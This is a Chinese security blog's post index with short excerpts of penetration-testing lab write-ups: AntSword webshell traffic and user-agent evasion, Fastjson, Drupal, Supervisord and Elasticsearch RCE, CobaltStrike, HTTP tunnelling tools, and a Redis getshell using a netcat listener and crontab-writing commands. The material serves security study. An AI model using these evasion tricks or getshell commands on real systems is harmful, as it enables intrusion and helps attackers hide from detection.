自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(24)
  • 资源 (1)
  • 收藏
  • 关注

原创 学蚁致用(二)——RSA流量免杀

学蚁致用(二)——RSA流量免杀这里仅演示蚁剑自带RSA编码器功能的使用方法,不做原理探讨。AntSword——编码设置——编码管理——RSA配置——生成,生成webshell:将webshell复制到服务端,然后新建编码器——PHP RSA:配置连接,注意这里选择刚才新建的编码器,解码器选择base64:警告:返回数据为空!代理抓包看看:未开启open_ssl 扩展,这里我们以phpstudy为例(有些版本有坑,我用的PHP-5.6.27)演示如何开启:开启后再次尝试:查看流量

2021-01-26 17:45:36 1419

原创 学蚁致用(一)——修改UA特征

学蚁致用(一)——修改UA特征找到AntSword\antSword-2.1.9\modules\request.js修改一处:const USER_AGENT = 'antSword/v2.1';找到AntSword\antSword-2.1.9\modules\update.js修改两处:.set('User-Agent', "antSword/v2.0")这里修改为Baiduspider-image以上修改完以后,还有一点需要注意,使用GET请求,仍然带有antsword特征,容易暴

2021-01-26 17:44:18 1118

原创 Fastjson RCE续(自动化)

Fastjson RCE续(自动化)一、漏洞介绍参阅Fastjson≤1.2.47 RCE。二、漏洞危害参阅Fastjson≤1.2.47 RCE。三、漏洞验证环境搭建:实验环境系统IP地址攻击机win10199.200.234.44靶机Centos7192.168.134.133docker pull vulhub/fastjson #拉取镜像docker run -d -p 8080:8080 -p 8443:8443 initidc/f

2020-07-31 15:34:37 2090

原创 Supervisord 远程命令执行漏洞(CVE-2017-11610)

Supervisord 远程命令执行漏洞(CVE-2017-11610)一、漏洞介绍Supervisord是一款用Python语言开发的管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。Supervisord曾曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610)。通过POST请求向Supervisord管理界面提交恶意数据,可以获取服务器操作权限,带来严重的安全风险。利用条件:Supervisor版本在受影响范围内Supervisor 9001管理端口可以被外网访问

2020-07-05 16:36:10 4369

原创 Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)一、漏洞介绍2018年3月28日,Drupal官方发布新补丁和安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。漏洞影响范围:截止2018年3月29日,还未有公开PoCDrupal 6.x版本Drupal 7.x版本Drupal 8.x版本二、漏洞危害远程代码执行。三、漏洞验证环境搭建:实验环

2020-07-04 23:26:50 6761

原创 Drupal 远程代码执行漏洞(CVE-2019-6339)

Drupal 远程代码执行漏洞(CVE-2019-6339)一、漏洞介绍Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。二、漏洞危害远程代码执行。三、漏洞验证环境搭建:实验环境系统IP地址攻击

2020-07-04 10:50:57 9003

原创 Fastjson≤1.2.47 RCE

Fastjson≤1.2.47 RCE一、漏洞介绍fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列

2020-06-14 16:45:47 958

原创 saltstack RCE

saltstack RCE一、漏洞介绍SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。国外某安全团队披露了Sal...

2020-05-09 19:55:05 490

原创 使用docker快速搭建渗透测试靶机环境

使用docker快速搭建渗透测试靶机环境安装dockerDocker 支持以下的 64 位 CentOS 版本:CentOS 7CentOS 8更高版本…这里我使用的是CentOS-7-x86_64-Everything-1804.iso的镜像。卸载旧版本较旧的Docker版本称为docker或docker-engine。如果已安装这些程序,请卸载它们以及相关的依赖项。$ su...

2020-04-27 17:42:41 2777

原创 FRP之通过ssh 访问内网机器

FRP之通过 ssh 访问内网机器frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https应用协议提供了额外的能力,且尝试性支持了点对点穿透。| 实验环境 | 系统 |IP地址|–|--|–||VPS | CentOS Linux release 7.3.1611 (Core) | x.x.x.x(公网地址)|内网虚拟机 | ...

2020-01-07 15:10:25 779

原创 reGeorg + Proxifier搭建SOCKS正向代理

reGeorg + Proxifier搭建SOCKS正向代理$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v]Socks server for reGeorg HTTP(s) tunnelleroptional arguments:-h, --help show this help message and exit...

2020-01-06 20:27:39 2845

原创 Tunna搭建HTTP正向代理

Tunna搭建HTTP正向代理Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。使用python proxy.py -u -l [options]选项--help, -h 显示帮助消息并退出。--url=URL, -u URL远程webshell--lport=LOCAL_PORT, -l LOCAL_PORT 本地监听...

2020-01-06 16:04:57 2554 1

原创 reDuh搭建HTTP正向代理

reDuh搭建HTTP正向代理reDuh是Glenn Wilkinson在2008年美国黑客大会上演示的一款正向代理工具,该工具实现了HTTP代理功能。实验环境系统IP地址DCWindows Server 2012 R210.10.10.10(Host-Only模式)WEB服务器Windows Server 2008 R210.10.10.80(Host...

2020-01-06 11:38:31 1165

原创 CobaltStrike系列学习笔记——(二)提权

CobaltStrike系列学习笔记——(二)提权实验环境系统IP地址服务器kali192.168.134.130靶机win7192.168.134.135先来回顾上一节的内容进入目录:root@kali:~# cd cobaltstrike3.14/启动服务器:root@kali:~/cobaltstrike3.14# ./teamserv...

2019-12-07 20:52:20 5328 3

原创 CobaltStrike系列学习笔记——(三)与metasploit互相派生shell

CobaltStrike系列学习笔记——(三)与metasploit互相派生shell实验环境系统IP地址CS(服务器/客户端)kali192.168.134.130靶机win7192.168.134.135MSFkali192.168.134.138...

2019-12-07 15:35:38 1554

原创 CobaltStrike系列学习笔记——(一)基础流程

CobaltStrike系列学习笔记——(一)基础流程实验环境系统IP地址服务器kali192.168.134.130靶机win7192.168.134.135CobaltStrike分为服务端和客户端,为了方便操作,本次实验中我们把服务端和客户端部署在同一台主机上。切换到CobaltStrike所在目录,执行以下命令,启动服务端:./tea...

2019-12-02 12:48:31 1836 1

原创 Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)

Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)一、漏洞介绍由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。二、漏洞危害...

2019-11-22 14:18:47 532

原创 Jenkins功能未授权访问导致的远程命令执行漏洞

Jenkins功能未授权访问导致的远程命令执行漏洞一、漏洞介绍Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,利用该功能,可以执行系统命令,该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在未授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。二、漏洞危害...

2019-11-21 17:54:08 3279

原创 NFS未授权访问

NFS未授权访问一、漏洞介绍NFS(Network File System)即网络文件系统,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。若运维人员未对文件访问进行控制,将导致本地文件可被任意读取。二、漏洞危害本地文件可被任意读取。三、漏洞验证首先执行showmount试试...

2019-11-20 17:41:57 8363

原创 Fortinet FortiOS路径遍历漏洞 CVE-2018-13379

Fortinet FortiOS路径遍历漏洞 CVE-2018-13379一、漏洞介绍Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、VPN、Web内容过滤和反垃圾邮件等多种安全功能。在2019年blackhat上,安全研究人员公布了Fortinet FortiOS多个漏洞,包括For...

2019-11-09 11:25:35 6236 5

原创 Mysql身份认证漏洞 CVE-2012-2122

Mysql身份认证漏洞 CVE-2012-2122一、漏洞介绍MariaDB和MySQL在用户验证的处理上存在漏洞。攻击者可利用该漏洞绕过某些安全限制,也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只...

2019-11-08 18:56:36 783 1

原创 RTSP默认口令/弱口令漏洞

RTSP 默认口令/弱口令漏洞一、漏洞介绍RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。二、漏洞危害攻击者可通过VLC等视频播放软件打开r...

2019-11-04 17:28:02 13528 1

原创 《Redis未授权访问getshell》复现笔记(二)

《Redis未授权访问getshell》复现笔记(二)复现完了写马getshell,我们再来复现一下利用crontab反弹shell:使用nc.exe在攻击机上监听9999端口:nc –lvvp 9999还是使用Redis Clinet写入如下命令config set dir /var/spool/cronconfig set dbfilename rootset xxx "\n...

2019-09-16 10:42:30 500

原创 《Redis未授权访问getshell》复现笔记(一)

《Redis未授权访问getshell》复现笔记(一)利用周末复现了一下Redis未授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。一、 环境介绍靶机:CentOS 6.5 (点击下载) IP:192.168.17.140攻击机:Win10(本机) IP:192.168.8.195二、...

2019-09-12 14:33:35 712

Elasticsearch漏洞检测.rar

Elasticsearch漏洞检测工具,包含Elasticsearch_1.2漏洞利用工具.jar和esExploit (elasticsearch)终极版.jar(Powered By VTI),如有侵权请联系删除。

2019-11-22

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除